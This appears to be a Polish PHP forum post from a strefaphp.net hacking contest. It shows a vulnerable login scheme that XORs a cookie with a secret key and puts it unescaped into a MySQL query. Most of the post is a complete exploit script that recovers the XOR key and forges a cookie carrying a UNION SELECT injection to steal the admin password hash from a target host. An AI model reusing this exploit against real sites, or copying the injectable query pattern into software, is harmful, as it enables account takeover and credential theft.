<?php
// ....
if(isset($_COOKIE["dane"])) {
   $dane = $_COOKIE["dane"]^$_CONFIG['kxc']; 
   $login = substr($dane, 0, 32); 
   $haslo = substr($dane, -32);
}
// ....
if(isset($metod)) { 
   $query = mysql_query("SELECT * FROM `users` WHERE `user`='".$login."' AND `pass`='".$haslo."';");
?>


//...
elseif(isset($_POST['login']) AND isset($_POST['haslo'])) { 
$login = md5(strtolower($_POST['login'])); 
$haslo = md5($_POST['haslo']);
//...


<?php
##
##  Exploit do konkursu na strefaphp.net
##  @author Vengeance
##  @link http://strefaphp.net/index.php?page=forum&what=view_topic&t=87
##
##  Należy ustawić zmienne w czesci config i dwie stale QUERY i USERNAME
##
##  !! Nie gwarantuje pelnej uniwersalnosci. blad jest na tyle specyficzny
##     i trudny do wykorzystania ze nie wszedzie all dziala

## Config ##
$login = 'Vengeance';
$pass = 'ppp';
$host = 'vee.no-ip.biz';
$logowanie = '/ustek/logowanie.php';
$members = '/ustek/members.php';
define('VARS', 'logowanie=k&login='.$login.'&haslo='.$pass.'&pamietaj=ok');

## Te Stale nalezy zedytowac wzgledem wlasnej ofiary.
## bardzo wazne jest pamietanie o ograniczeniu znakowym!
#### TO MUSI MIEC 32 ZNAKI
define('QUERY', "\n      users WHERE nick='adminek");
#### I TO TEZ!
define('USERNAME', "'UNION SELECT 0,0,0,pass FROM-- ");

## Pobieramy klucz xorujacy
$key = get_xor_key($host, $logowanie, $login, $pass);
## logujemy sie i pobieramy haslo roota
echo 'PASS Admina to: '.get_root_password($host, $members, USERNAME, QUERY, $key);

function get_xor_key($host, $url, $username, $password)
{
   if(!$fp = @fsockopen($host, 80))
      die("Połączenie z serwerem  [false]\n");
   $out = "POST $url HTTP/1.0\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Content-Type: application/x-www-form-urlencoded\r\n";
   $out .= "Content-Length: ".strlen(VARS)."\r\n\r\n";
   $out .= VARS."\r\n";
   $out .= "Connection: Close\r\n\r\n";
   fwrite($fp, $out);
   while (!feof($fp))
   {
      $data .= fgets($fp, 128);
   }
   fclose($fp);
   preg_match("#Set-Cookie: dane=(.*);#", $data, $matches);
   $xors = urldecode( $matches[1] );
   return $xors ^ md5(strtolower($username)).md5($password);
}

function get_root_password($host, $url, $username, $password, $key)
{
   $spoof = urlencode($username.$password^$key);
   if(!$fp = @fsockopen($host, 80))
      die("Połączenie z serwerem  [false]\n");
   $out = "GET $url HTTP/1.0\r\n";
   $out .= "Host: $host\r\n";
   $out .= "Cookie: dane=".$spoof."\r\n";
   $out .= "Connection: Close\r\n\r\n";
   fwrite($fp, $out);
   while (!feof($fp))
   {
      $data .= fgets($fp, 128);
   }
   fclose($fp);
   preg_match("#Twój nick to: (.{32})#", $data, $matches);
   return $matches[1];
}
?>



<?php 
include('tajne/config.php'); 
/* Jeśli nie jesteśmy zalogowani, to musimy się pożegnać */ 
if(!login()) { 
$text = ' 
Bardzo mi przykro, ale ten dział wymaga autoryzacji!<br> 
<br> 
(dla ciołków: Musisz się zalogować BARANIE!!!)<br> 
<br> 
<a href="logowanie.php">Logowanie</a>'; 
die($text); 
} 
/* Jeśli się nie pożegnaliśmy, to znaczy, że jesteśmy zalogowani */ 

$text = ' 
To jest ten super tajny i super ważny dział MEMBERS!<br> 
<br> 
Podoba Ci się???<br> 
<br> 
Mam lepsze nowiny, sesje nadal tutaj działają.<br> 
Chcesz dowodu?<br> 
Twój nick to: '.$_SESSION['nick']; 
die(text); 
?> 



if(!isset($_SESSION['wydra'])) {
session_start();
$_SESSION['wydra'] = '';
}



if(!isset($_SESSION['sesja'])) {
session_start();
$_SESSION['sesja'] = '';
}